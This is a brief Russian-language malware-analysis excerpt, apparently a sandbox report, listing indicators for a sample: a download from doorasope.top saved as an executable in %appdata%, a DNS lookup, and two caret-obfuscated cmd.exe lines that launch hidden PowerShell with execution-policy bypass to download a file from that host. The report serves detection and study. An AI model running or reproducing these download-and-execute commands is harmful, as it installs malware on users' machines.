Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^w^eRSh^ELL.e^xE ^-E^XEcu^Ti^on^p^OL^iC^Y^ bYPASS -nOpR^of^i^le^ -w^indOWSTYL^E^ hID^d^e^n (N^E^W-O^BjE^cT Sys^TE^M^.n^eT.w^Eb^c^li^ENT).dowNl^oA^dfI^l^e(^'http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "Po^w^eRSh^ELL.e^xE ^-E^XEcu^Ti^on^p^OL^iC^Y^ bYPASS -nOpR^of^i^le^ -w^indOWSTYL^E^ hID^d^e^n (N^E^W-O^BjE^cT Sys^TE^M^.n^eT.w^Eb^c^li^ENT).dowNl^oA^dfI^l^e(^'http://www.doo...' (со скрытым окном)